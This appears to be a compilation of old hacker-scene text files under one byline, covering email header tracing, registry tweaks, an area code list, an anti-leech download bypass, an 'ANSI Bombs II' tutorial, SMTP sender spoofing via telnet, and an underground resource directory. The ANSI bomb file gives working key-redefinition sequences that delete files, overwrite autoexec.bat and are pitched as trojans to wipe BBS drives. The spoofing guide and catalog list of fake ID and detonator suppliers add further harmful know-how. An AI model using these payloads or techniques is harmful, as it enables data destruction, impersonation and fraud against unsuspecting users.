Backtracking EMAIL Messages

Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.

So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .

If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.

Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.

Return-Path: <s359dyxtt@yahoo.com>

X-Original-To: davar@example.com

Delivered-To: davar@example.com

Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108])
by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7
for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)

Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200

Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>

From: "Maricela Paulson" <s359dyxtt@yahoo.com>

Reply-To: "Maricela Paulson" <s359dyxtt@yahoo.com>

To: davar@example.com

Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha

Date: Sun, 16 Nov 2003 19:42:31 +0200

X-Mailer: Internet Mail Service (5.5.2650.21)

X-Priority: 3

MIME-Version: 1.0

Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"


According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.

The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.

The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.


Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking.

davar@nqh9k:[/home/davar] $whois 12.218.172.108

AT&T WorldNet Services ATT (NET-12-0-0-0-1)
12.0.0.0 - 12.255.255.255
Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-0-1)
12.218.168.0 - 12.218.175.255

# ARIN WHOIS database, last updated 2003-12-31 19:15
# Enter ? for additional hints on searching ARIN's WHOIS database.

I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.

davar@nqh9k:[/home/davar] $nslookup 12.218.172.108

Server: localhost
Address: 127.0.0.1

Name: 12-218-172-108.client.mchsi.com
Address: 12.218.172.108

Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.

There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.

A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.

But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars.

By Trivedi Jay (B E Electrical Engineer )

email : erjaytrivedi@yahoo.com

B.A. regedit

Ok m8s, any of you that do websites and like to open .html and similar files in notepad to edit scrpits, this is THE coolest windows registry edit ever you can download the zip file with the .reg in it (run it and it automatically adds itself to your registry) or do it manually

CODE
http://www.geocities.com/ichbindeingott5/winXP-Notepad.zip

Manually:

regedit and navigate to
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\Shell
add the key "notepad"
it's default value should be "Open with Notepad"
now, under "notepad", add the key "Command"
it's default value should be (with the quotes) "C:\Windows\System32\Notepad.exe" "%1"

ok, exit regedit and go right click on ANY file...
your new option: Open with Notepad

HOW BADASS IS THAT ??? I FOUND THIS ONE ON MY OWN!!!!!!

I know this one works on XP and 2000, you can PROBABLY enter it manually on windows 9x, but i have not tested that

okay okay, i know maybe not everyone cares...but this was fun for me because i love tweaking my computer AND it makes some web design stuff eaiser for me :D

By Trivedi Jay (B E Electrical Engineer )

email : erjaytrivedi@yahoo.com

Auto End Tasks to Enable a Proper Shutdown

This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.

1. Copy the following (everything in the box) into notepad.

QUOTE Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management] "ClearPageFileAtShutdown"=dword:00000001 [HKEY_USERS\.DEFAULT\Control Panel\Desktop] "AutoEndTasks"="1" [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control] "WaitToKillServiceTimeout"="1000"

2. Save the file as shutdown.reg

3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.

By Trivedi Jay (B E Electrical Engineer )

email : erjaytrivedi@yahoo.com

Area Codes and Time Zones

Time Zones 

 Atlantic

 Newfoundland Nova Scotia New Brunswick

 Eastern

 Maine New Hampshire Vermont Massachussets New York Rhode Island Connecticut Pennsylvania New Jersey Delaware Maryland Ohio Indiana Michigan West Virginia Virginia Kentucky North Carolina Tennessee South Carolina Georgia Florida Quebec Ontario

 Central

 Manitoba North Dakota South Dakota Minnesota Wisconsin Michigan Iowa Nebraska Illinois Kansas Missouri Kentucky Tennessee Arkansas Oklahoma Texas Louisiana Alabama Mississippi Indiana

 Mountain

 Alberta Saskatchewan Montana Idaho Wyoming South Dakota Nebraska Utah Colorado Kansas Oklahoma Arizona New Mexico

 Pacific

 British Columbia Washington Montana Oregon Nevada California Utah

Area Code Listing

   205 - Alabama                       907 - Alaska                      602 - Arizona
   501 - Arkansas                      714 - California (Orange)    818 - California
   213 - California (LA)             916 - California                      619 - California
   415 - California (SF)             408 - California (San Jose)     303 - Colorado
   203 - Connecticut                  302 - Delaware                      904 - Florida
   305 - Florida (Miami)            404 - Georgia (Atlanta)           808 - Hawaii
   208 - Idaho                           312 - Illinois (Chicago)            317 - Indiana
   219 - Indiana (Souend)          515 - Iowa (Des Moines)        316 - Kansas
   502 - Kentucky                     504 - Lousiana (N. Orleans)    207 - Maine
   301 - Maryland                     617 - Massachusetts                313 - Michigan
   616 - Michigan                      612 - Minnesota                      601 - Mississippi
   816 - Missouri (Kansas C)    314 - Kansas (St. Louis)          406 - Montana
   402 - Nebraska                    702 - Nevada                           603 - New Hampshire
   201 - New Jersey (Newark)  609 - New Jersey (I'm here)    505 - New Mexico
   718 - NYC (Brooklyn, S.I.)  212 - NYC (Bronx, Mhattan)   518 - NY (Albany)
   716 - NY (Buffalo)               516 - NY (Long Island)            315 - NY (Syracuse)
   914 - NY (White Plains)       704 - North Carolina                919 - North Carolina
   701 - North Dakota              513 - Ohio (Cincinnati)             216 - Ohio
   614 - Ohio (Columbus)         419 - Ohio (Toledo)                 405 - Oklahoma
   918 - Oklahoma (Tulsa)        503 - Oregon                            215 - Philadelphia PA
   401 - Rhode Island (cough)   803 - South Carolina                 605 - South Dakota
   901 - Tennessee (Memphis)  615 - Tennessee (Nashville)       806 - Texas(Cow Hell)
   214 - Texas (Dallas)             817 - Texas (Forth Worth)         713 - Texas (Houston)
   512 - Texas (San Antonio)    801 - Utah                                 802 - Vermont
   703 - Virginia (Arlington)      804 - Virginia (Richmond)          202 - Washington DC
   206 - Washington (Seattle)   304 - West Virginia                    608 - Wisconsin
   307 - Wyoming                    666 - Where do you think

        Well that will make a nice printout for your wall, won't it.  Now you know where you're calling...

By Trivedi Jay (B E Electrical Engineer )

email : erjaytrivedi@yahoo.com

Anti leech hacking tutorial

       I was just asking to know if there is some audiance before here is my methode for hacking anti leech we gona use a soft calde proxo mitron proxomitron is an anti bull script web proxy it' works buy applying some rules to elliuminte pop up and many other thing but for our cas we need to disactive all this filtering first goto www.proxomitron.info download a copy of the soft then you need to unselect all the option of the soft and clik on log window no go to a anti leech web site use the plug in and not netpumper in the plugin add a proxy you must put this proxy adress 127.0.0.1 8080 for http the same for ftp now select the file to download a click download watch in proximitron log winodws you will see many internal forwarding if the file are located in a ftp server proximitron dont handel them and you will find an error in a ftp address if it's a http adress you will find some thing like get /blablalma/bla/file site tr.com and you have found the address it' tr.com/blabla/file

By Trivedi Jay (B E Electrical Engineer )

email : erjaytrivedi@yahoo.com

ANSI Bombs II: Tips and Techniques

I. Introduction

 After writing the last file, a lot of people let me know about the mistakes I had made. I guess this file is to clear up those miscon ceptions and to let people know about some of the little tricks behind ANSI bombing. Of course, ANSI bombing isn't as dangerous as a lot of people make it out to be, but bombs are still fun to make and with a little planning deliver some degree of success. ANSI bombing can be dangerous, so I am tired of hearing people say that an ANSI bomb is harmless, another misconception I hope to clear up. Now, most people that have spent time experimenting with ANSI bombs probably know most of the material in this file, but it might be fun just to read anyway.

2. Misconceptions

 In my last file, I made three major blunders, or what I would con sider to be major blunders. First, I said that ANSI bombs could be used on BBSs to screw people over, but I guess I was wrong. It was pure speculation on what other people had said that made me say that. ANSI codes, including those that redefine keys, are sent over the lines, but most comm programs don't use ANSI.SYS; they use their own version of ANSI, which doesn't support key redefinition. Some people might have a program that supports it, but I haven't seen it yet. I have tested bombs on systems on my own and proved to myself that they don't work. I have also seen people fuck up bombs that would have worked by uploading them in a message. The second misconception is that ANSI bombs are dangerous when put into zips. I haven't really tested this out much, but from what I hear with the newer versions of PKZIP, you have to specify that you want to see ANSI comments when unzipping. It is unlikely that you would waste your time unzipping something again after seeing "Format C:" in the middle of an escape code. I could be mistaken, but I'm pretty sure that I'm right. Third, the last thing that was a misconception is that VANSI.SYS will protect your system from key redefinition. Maybe the newer versions don't support key redefinition, but mine sure as hell does. There are pro grams out there that don't support it, but I don't know any of the names. Of course, if I were you, I would be wary about using some thing other then ANSI. I have a few friends that are working on "A Better ANSI" for PDers, which, instead of being better, really screws them over.

3. An Overview

 Now, in case you haven't read my other file (it's called ANSI.DOC, kind of lame but fairly informative), I'll briefly go over the struc ture of an ANSI bomb. Skip this part if you know what an ANSI bomb is and how to make one. In ANSI everything is done with a system of escape codes. Key redefinition is one of those codes. (From now, whenever I say ESC, I really mean the arrow, ). Here is a basic command: ESC [13;27p This would make the <Enter> key (13 is the code for enter) turn into the <Escape> key (27 is the code for escape). The always has to be there, as do the bracket and the "p", but what is between the bracket and the "p" is up to you. The first number is always the key that you want to be redefined. If there is a zero for the first num ber, that means the key is in the extended set, and therefore, the first two numbers are the code. The bracket signifies the beginning of the definition, and the "p" signifies the end. Whenever you want a key pressed, you have to use it's numerical code (i.e. 13 is the code for <Enter>). You can't redefine strings, but you can redefine a key to become a string (i.e. ESC [13;"Blah"p would make <Enter> say "Blah"). Strings must be inside of quotes, which includes commands that you want typed on the DOS prompt (i.e. ESC [13;"Del *.*";13p would delete everything in the directory, note that 13 stands for Enter in this case, not the redefinition). An escape code can have as many commands as you want in it, but each one has to be separated by a semi-colon. You can only redefine one key in each escape code, so if you want to redefine another key, you have to start another escape code. That's about it when it comes to bombs, now that you have the basics, all you really need is a little imagination.

4. Tips and Tricks

A. The Y/N Redefinition

 Now, here's a simple but fun little ANSI bomb:

 ESC [78;89;13p ESC [110;121;13p

 Basically, all this does is turn a capital "N" into "Y" and a lower-case "n" into "y". Alone this doesn't do too much, except for screw around with what they are typing. On the other hand, try adding this line of code to the ANSI bomb:

 ESC [13;27;13;"del *.*";13p

 Most people would automatically press "N" when they see "Del *.*", but when they do, they will be screwed over. This portion of a bomb is very useful when it comes to making good bombs.

 B. Screwing with the Autoexec.bat

 Here is another line of code that you may find useful in future bombing projects:

 ESC [13;27;13;"copy bomb.ans c:\";13;"copy con c:\autoexec.bat";13;"type bomb.ans";13;0;109; 13;"cls";13p

 This line of code makes the bomb a little more permanent and a little more dangerous. It copies the bomb into the root directory, then it change/creates the autoexec.bat, so the bomb is typed after every boot-up. Of course, the person could just boot off a disk, but I'm sure this would get them a few time. It could also probably appear as though it were a virus, scaring the shit out of the owner of the computer.

C. Turning Commands into Other Commands

 One of the best pranks to do to someone using an ANSI bomb is to redefine commands. That way if they type in "copy", it will turn into "Del *.*". Since you can't actually change the whole string, you have to take a different approach. You have to change a few of the keys, so when typed, they type and execute the desired command. I guess it would be coolest to have to command exactly the same length; that way you could redefine one key at a time to obtain the desired effect. It doesn't really matter how you do it, just as long as it works. You might make an ANSI that says "Wow, check out what this bomb did to your directory", and then have it redefine the keys, so when they type in "dir", it turns into "del". I think you get the idea.

D. Trojans

 By now, everybody knows what a Trojan is. You probably wouldn't think so, but ANSI bombs can be used as Trojans and in Trojans. First, if you are planning on crashing a board, but you're not very good at programming, then make yourself an ANSI bomb. Try to find out in which directory the main files for running the BBS are stored. They are usually under the name BBS or the name of the software, like WWIV or Telegard. Then, make a bomb that either just deletes all the files in that directory, or if you want the board to be down a longer time, then make one that formats the Hard Drive. In this form ANSI bombs, if they are well planned out, can be easy to make Trojans. Second, ANSI bombs can used in Trojans. This is probably stretching it a little, but say you wanted to write a Trojan that would delete a directory, every time you typed a certain key, then you could use an ANSI bomb. First make some batch and com/exe files that would search for protecting programs like Norton and turn them off. Then you could copy the file into the root directory, along with your versions of autoexec.bat, config.sys, ANSI.sys, and whatever else. (To make it look more realistic make the files Resource.00x to trick the user, then when copying, use the real name). Then somehow lock the computer up or do a warm boot through some pd program, which is easily attain able. When the computer loads back up, you can screw that shit out of them with your ANSI bomb.

5. Conclusion

 It would seem to some people that ANSI bombs are very dangerous, and to others that they are stupid or lame. Personally, I think that ANSI bombs are just plain old fun. They're not too hard to make, but there is a lot that you can do with them. They are nowhere near as malicious as virii, so if you're looking for unstoppable destruction, look elsewhere, but they do serve their purpose. I know that there are programs out there that help you program ANSI bombs, but I think that they kind of take the fun out of them. Probably, some day soon, I'll quit making ANSI bombs and start looking more into virii and pure Trojans. But for now, ANSI bombs suit my purpose.
                             
TRG

Appendix A: Key Code Program

 Here is a small program, which I find very helpful. After loading it up, it tells you the numeric code for every key you type in. Spe cial means that it is in the extended set and therefore uses zero, and "q" ends the program. Unfortunately, I can't take any credit for this program. I got it over the phone from Heavymetl, and it was made by his brother. So many thanks go out to Heavymetl and his brother, even though they'll probably be a little pissed at me for including this in my file. It is in Pascal and can be compiled in most Turbo Pascal compilers.

    Use CRT;
    Var
      CH : CHAR;
    Begin
      Repeat
        CH := ReadKey;
        If CH = #0 then
          Begin
            CH := ReadKey;
            WriteLn(CH,'(Special) - ',ORD(CH));
          End
        Else
          WriteLn(CH,' - ',ORD(CH));
      Until
        CH = 'q';
    End.

    Thanks go out to:

 Heavymetl and his brother for the program and ideas. Weapons Master for the input and the help he has given me. Everybody else who has helped me out; you know who you are, or at least, you think you know who you are. Most of all, to those brave soldiers risking their asses everyday for us half-way across the world in Saudi Arabia. Your deeds haven't gone unnoticed, of course that's mainly because that's all the news ever shows nowadays. Also, to anybody else I might have forgotten. Thanks.

By Trivedi Jay (B E Electrical Engineer )

email : erjaytrivedi@yahoo.com

ANONYMOUS emails

Welcome to AIACAT on how to send ANONYMOUS e-mails to someone without a prog.

 I am Trivedi Jay and i am going to explain ya a way to send home-made e-mails. I mean its a way to send Annonimous e-mails without a program, it doesn't take
to much time and its cool and you can have more knowledge than with a stupid program that does all by itself.

This way (to hackers) is old what as you are newby to this stuff, perhaps you may like to know how these anonymailers work, (home-made)

Well.....
Go to Start, then Run...
You have to Telnet (Xserver) on port 25

Well, (In this Xserver) you have to put the name of a server without the ( ) of course...
Put in iname.com in (Xserver) because it always work it is a server with many bugs in it.
(25) mail port.

So now we are like this.

telnet iname.com 25

and then you hit enter
Then When you have telnet open put the following like it is written

helo

and the machine will reply with smth.

Notice for newbies: If you do not see what you are writing go to Terminal's menu (in telnet) then to Preferences and in the Terminal Options you tick all opctions available and in the emulation menu that's the following one you have to tick the second option.
Now you will se what you are writing.

then you put:

mail from:<whoeveryouwant@whetheveryouwant.whetever.whatever> and so on...
If you make an error start all over again

Example:
mail from:<askbill@microsoft.com.net>

You hit enter and then you put:

rcpt to:<lamer@lamer'sworld.com>
This one has to be an existance address as you are mailing anonymously to him.

Then you hit enter
And you type
Data
and hit enter once more

Then you write

Subject:whetever

And you hit enter

you write your mail

hit enter again (boring)

you put a simple:
.

Yes you don't see it its the little fucking point!
and hit enter
Finally you write
quit
hit enter one more time
and it's done

look:Try first do it with yourself I mean mail annonymously yourself so you can test it!
Don't be asshole and write fucking e-mails to big corps. bec' its symbol of stupidity and childhood and it has very very effect on Hackers they will treat you as a Lamer!

Really i don't know why i wrote this fucking disclaimer, but i don't want to feel guilty if you get into trouble....

Disclamer:

Trivedi Jay is not responsable for whetever you do with this info. you can destribute this but you are totally forbidden to take out the "By Trivedi Jay"  line. You can't modify or customize this text and i am also not responsable if you send an e-mail to an important guy and insult him, and i rectly advise you that this is  for educational porpouses only my idea is for learning and having more knowledge, you can not get busted with this stuff but i don't take care if it anyway happen to you.  If this method is new for ya probably you aren't a hacker so think that if someone wrote you an e-mail "yourbestfirend@aol.com"  insulting you and it wasn't him it but was some guy using a program or this info you won't like it.so Use this method if you don't care a a damn hell or if you like that someone insult you.

By Trivedi Jay (B E Electrical Engineer )

email : erjaytrivedi@yahoo.com

An Introduction to the Computer Underground

The Computer Underground consists of mainly two forms of media, printed and electronic, both will be discussed in this file. I use the word underground because some of the contents of this file are not the types of titles you would run across at your local bookstore or newsstand. The kind of information that makes up underground publications is mainly technical in nature, but, definitely not limited to that. One can also find tidbits about off-the-wall political views, drugs, weapons, and other topics that are not normally in the mainstream of our society.

The Computer Underground...

Com-put-er Un-der-ground   \kem-`pyt-er\  \`en-der-`grand\ (1970's)

  A group organized in secrecy, hidden behind aliases, to promote the free exchange of information regarding anything and everything including but not limited to Computers, Telephones, Radios, Chemicals, and ideas.

The CU is made up of men and women all over the globe and of all ages. Most of those involved in the CU consider it a hobby, but, there are those that are involved strictly for illegal purposes, i.e. Selling Pirated Software. I, like most people involved enjoy the information that can be obtained through all of the different avenues in the CU, i.e. Bulletin Boards, Underground Periodicals, Network Digests, and General Discussions between members.

The most common way members communicate is through Bulletin Boards. If you are reading this you know what a BBS is because this will not be released in printed form. There are thousands of BBSes around the world run by people for many reasons including: legitimate businesses, Software Technical Support, Hobby related, Pirated Software, Message Centers, etc...Some of the more common ones are RIPCO, Face-2-Face, Exec-PC, The Well, etc...

Currently there are many regular electronic magazines that are being published and there have been many that have discontinued for one reason or another. Some current ones include: PHRACK, NIA, PHANTASY, CUD, etc...Some discontinued ones include: PIRATE, PHUN, NARC, etc...

There is a current debate about whether or not an electronic media has the same constitutional rights as the printed one. That is for our congressmen to decide, but you could voice your opinion. I personally can't see the differ- -ence. Now, don't get me wrong I do not support the publishing of Long- distance codes or anything of that nature, but, I do support the exchange of other information, i.e. how to unprotect a game, how to make a smoke bomb, etc...

There are also "Underground Publications" like TAP, 2600, Cybertek, etc. These magazines are published in hard copy and deal with every considerable topic regarding the CU. Most of these magazines publish completely legal information that is obtained from public sources and is available to anyone and everyone.

I doubt that any of the following sources of information would mind if you use an alias to order any of their material, so I would recommend that you do just in case! You might even want to get yourself a private mail box for all of this "underground" information. I would also advise you to use a money order when purchasing anything also. They usually cost an extra 50 cents at the post office. Don't worry about using money orders with these people because I have personally made purchases from many of them without trouble.

The following information is provided to enable you to become more familiar with the CU and unusual information in general. Have fun and try not to get yourself in trouble.

Now for the meat of this Article!!!!

E L E C T R O N I C   M A G A Z I N E S

PHRACK  Predecessor to Phrack Classic
        Author:  Knight Lightning & Taran King
        Network Address:c483307@umcvmb.missouri.edu
        Other Address:
        BBS: None
        Last Issue: Phrack #30

PHRACK CLASSIC
        Author:  Doc Holiday, Crimson Death & Various Contributors
        Network Address: pc@well.uucp or cdeath@stormking.com
        Other Address:
        BBS:  None
        Last Issue: Phrack Classic #32 11/90

LOD     Legion Of Doom Technical Journals
        Author:  Eric Bloodaxe, Lex Luthor, Prime Suspect, Phase Jitter,
                 Professor Phalken, Skinny Puppy.
        Network Address: None
        Other Address:
        BBS:
        Last Issue:  LOD Tech Journal #4   May 20, 1990

PHUN    Phreakers/Hackers Underground Network
        Author:  Red Knight
        Network Address: N/A
        Other Address:
        BBS:
        Last Issue: P/HUN #5 05/07/90

ATI     Activist Times, Incorporated
        Author:  Ground Zero
        Network Address: gzero@tronsbox.xei.com
        Other Address:  ATI P.O. Box 2501  Bloomfield, NJ 07003
        BBS:
        Last Issue: ATI #53 12/05/90

NIA     Network Information Access
        Author: Guardian Of Time & Judge Dredd
        Network Address:  elisem@nuchat.sccsi.com
        Other Address:
        BBS:
        Last Issue: NIA #70  02/91

PHANTASY
        Author: The Mercenary
        Network Address: None
        Other Address: The I.I.R.G. 862 Farmington Ave, Suite-306,
                       Bristol, Ct 06010
        BBS:  Rune Stone  203-485-0088
        Last Issue: Phantasy V1N4 1/20/91

PIRATE
        Author: Various Authors
        Network Address: N/A
        Other Address:
        BBS: N/A
        Last Issue:  V1 #5 April 1990

ANE     Anarchy 'N' Explosives
        Author: Various Authors
        Network Address: N/A
        Other Address:
        BBS: N/A
        Last Issue:  #7 06/16/89

NARC    Nuclear Phreakers/Hackers/Carders
        Author: The Oxidizer
        Network Address: N/A
        Other Address:
        BBS:
        Last Issue: NARC #7 Fall 1989

SYNDICATE REPORTS
        Author:  The Sensei
        Network Address:
        Other Address:
        BBS:
        Last Issue:

 This is not an attempt to list all of the known magazines but just some of the more popular ones. If I left a particular one out that you feel should of been included I apologize.

All of the above magazines can be found in the CUD archives and at many of the Bulletin Board Systems listed at the end of this file.

P R I N T E D    M A G A Z I N E S

Author: Emmanuel Goldstein
Network Address: 2600@well.sf.ca.us
Other Address:   2600 Magazine, P.O. Box 752, Middle Island, NY 11953

2600 Magazine is published quarterly, 48 pages per issue. Subscriptions are $18 U.S. for a year in the U.S. and Canada, $30 overseas. Corporate subscriptions are $45 and $65 respectively. Back issues are available for $25 per year, $30 per year overseas and they go back to 1984.

Phone 516-751-2600
Fax   516-751-2608


TAP/YIPL  Formerly YIPL "Youth International Party Line"
          Now TAP "Technical Assistance Party"

TAP Magazine
P.O. Box 20264
Louisville, KY 40250
Most all issues will cost $1.00 for US Citizens and $2.00
for overseas.  Terms are CASH, postal money order,
or regular money order with the payee left blank.
BBS: 502-499-8933

Cybertek Magazine
Published by OCL/Magnitude
P.O. Box 64
Brewster NY 10509
$2.50 for sample issue
$15 year for 6 issues


Mondo 2000  (Formerly Reality Hackers Magazine / High Frontiers)
P.O. Box 10171
Berkley, CA 94709-5171
Phone 415-845-9018
Fax   415-649-9630
$24 for five issues
Frank Zappa subscribes to Mondo 2000!!!

Fact Sheet Five
6 Arizona Ave
Rensselaer, NY 12144-4502
$3.50 for a sample issue.
$33 a year for 8 issues
Phone 518-479-3707

Fact Sheet Five reviews any independent news media, i.e. 2600, TAP,
Books, Music, Software, etc.

Full Disclosure  by Glen Roberts
P.O. Box 903-C
Libertyville, Illinois 60048
Free sample issue
$18 for 12 issues

Deals with Privacy, electronic surveillance and related topics.

Anvil
P.O. Box 640383f
El Paso, TX 79904

Computer Security Digest
150 N. Main Street
Plymouth, MI 48170
Phone 313-459-8787
Fax   313-459-2720
$125 U.S. per year.
Overseas $155 U.S. per year.

HAC-TIC Dutch Hacking Magazine
Network Address: ropg@ooc.uva.nl
Other Address:  Hack-Tic P.O. Box 22953  1100 DL Amsterdam
Phone: +31 20 6001480

Privacy Journal
P.O. Box 15300
Washington D.C. 20003
Phone  202-547-2865

Monitoring Times
140 Dog Branch Road
Brasstown, North Carolina 28902


B O O K S

• Anarchist Cookbook???
• Poor Man's James Bond by Kurt Saxon
• Big Secrets by William Poundstone
• Bigger Secrets by William Poundstone
• How to get anything on anybody by Lee Lapin
• Signal--Communication Tools for the Information Age  A Whole Earth Catalog
•   (Highly Recommended!!!)
• Neuromancer by William Gibson
• Out of The Inner Circle by Bill Laundreth
• Hackers by Steven Levy
• The Cookoo's Egg by Clifford Stoll
• The Shockwave Rider
• Information for sale by John H. Everett
• Hackers Handbook III  by Hugo Cornwall
• Datatheft by Hugo Cornwall
• The International Handbook on Computer Crime by U. Sieber
• Fighting Computer Crime by D. Parker
• Foiling the System Breakers by J. Lobel
• Privacy in America by D. Linowes
• Spectacular Computer Crimes by Buck BloomBecker
• Steal This Book by Abbie Hoffman

M I S C E L L A N E O U S    C A T A L O G S

Loompanics LTD
P.O. Box 1197
Port Townsend, WA 98368

Paladin Press
????


Consumertronics
2011 Crescent DR.
P.O. Drawer 537
Alamogordo, NM 88310
Phone 505-434-0234
Fax   500-434-0234(Orders Only)

Consumertronics sells manuals on many different hacking/phreaking related
topics, i.e. "Voice Mail Box Hacking", "Computer Phreaking", etc.

Eden Press Privacy Catalog
11623 Slater "E"
P.O. Box 8410
Fountain Valley, CA 92728
Phone 1-800-338-8484  24hrs, 7 days a week.

Here is the opening paragraph from their catalog:

Welcome to the Privacy Catalog, Over 300 publications explore every aspect of privacy in ways that are not only unique, but also provocative. Some books may seem "controversial", but that results only from the fact that people can enjoy many different views of the same subject. We endeavor to offer views that will prove both helpful and thoughtful in the many areas where privacy may be a concern.

Criminal Research Products
206-218 East Hector Street
Conshocken,PA 19428

Investigative equipment and electronic surveillance items.

Ross Engineering Associates
68 Vestry Street
New York,NY 10013

Surveillance items

Edmund Scientific CO.
101 E. Gloucester Pike
Barrington, NJ 08007

Catalog of gadgets and devices including items which are useful to the
surveillance craft.

Diptronics
P.O. BOX 80
Lake Hiawatha, NJ 07034

Microwave TV Systems
Catalog costs $3

Garrison
P.O. BOX 128
Kew Gardens, NY 11415

Locksmithing tools and electronic security gadgets.
Catalog costs $2.

Bnf Enterprises
P.O. BOX 3357
Peabody, MA 01960

General electronics supplier.

Mouser Electronics
11433 Woodside avenue
Santee, CA 92071

Sells most electronic components parts and equipment.

Benchmark Knives
P.O. BOX 998
Gastonia, NC 28052

Call for a free catalog. (704-449-2222).

Excalibur Enterprises
P.O. BOX 266
Emmans, PA 18049

Night vision devices.
Catalog costs $5

DECO INDUSTRIES
BOX 607
Bedford Hills, NY 10157

Sells mimiture Electronic Kits

Matthews Cutlery
38450-A N. Druid Hills RD.
Decatur, GA 30033

Their catalog contains over 1000 knives and costs $1.50.

U.S. Cavalry Store
1375 N. Wilson Road
Radcliff, KY 40160

Military & paramilitary clothing & gear.
Catalog costs $3.

The Intelligence Group
1324 West Waters Avenue
Lighthouse Point, FL 33064

Sells video equipment used for investigative purposes.

Columbia Pacific University
1415 Third Street
San Rafael, CA 94901

Bachelors, Masters, and Doctorate degrees

Video & Satellite Marketeer
P.O. BOX 21026
Columbus, OH 43221

Newsletter containing video, vcr, satellite dishes, etc.

Santa Fe Distributors
14400 W. 97'TH Terrace
Lenexa, KS 66215

Radar detectors and microwave tv systems.
(913-492-8288)

Alumni Arts
BOX 553
Grant's Pass, OR 97526

Reproductions of college diplomas.
Catalog costs $3

Merrell Scientific CO.
1665 Buffalo Road
Rochester, NY 14624

Chemical suppliers
Catalog costs $3.

K Products
P.O. BOX 27507
San Antonio, TX 78227

I.D. Documents.
Catalog costs $1.

City News Service
P.O. BOX 86
Willow Springs, MO 65793

Press I.D. cards.
Catalog costs $3.

Matthews Police Supply CO.
P.O. BOX 1754
Matthews, NC 28105

Brass knuckles etc.

Taylor
P.O. BOX 15391
W. Palm Beach, FL 33416

Drivers license, student I.D. cards, etc.

Capri Electronics
ROUTE 1
Canon, GA 30250

Scanner accessories

Liberty Industries
BOX 279  RD 4
Quakertown, PA 18951

Pyrotechnic components
Catalog costs $1

DE VOE
P.O. BOX 32
BERLIN  PA  15530

Sells information on making electronic detonators.

Scanner World USA
10 New Scotland Avenue
Albany, NY 12208

Cheap scanner receivers.

H & W
P.O. BOX 4
Whitehall, PA 18052

Human Skulls, arms, legs, etc.
A complete list is available for $1 and Self Addressed Stamped Envelope.


Abbie-Yo Yo Inc.
P.O. Box 15
Worcester MA 01613

This is an old address that I could not verify but, they used to sell the book
"Steal This Book".

For most of these catalogs you could probably play dumb and just send them a letter asking for a catalog or brochure without paying a cent.  Pretending not to know that their catalogs cost anything.


M I S C E L L A N E O U S     R E P O R T S   &   P A P E R S

Crime & Puzzlement by John Perry Barlow

The Baudy World of the Byte Bandit  A Postmodernist Interpretation of the Computer Underground by Gordon Meyer & Jim Thomas

Concerning Hackers Who Break into Computer Systems by Dorothy E. Denning

The Social Organization of the Computer Underground by Gordon R. Meyer

Computer Security  "Virus Highlights Need for Improved Internet Management"
                   By the United States General Accounting Office.  GAO/IMTEC-
                   89-57
                   Call 202-275-6241 for up to 5 free copies.

N E T W O R K     D I G E S T S

Telecom Digest
        Moderator:  Patrick Townson
        Network Address:  telecom@eecs.nwu.edu

Risks Digest
        Moderator: Peter G. Neumann
        Network Address:  Risks@csl.sri.com


Virus-l Digest
        Moderator:  Kenneth R. Van Wyk
        Network Address:  krvw@cert.sei.cmu.edu

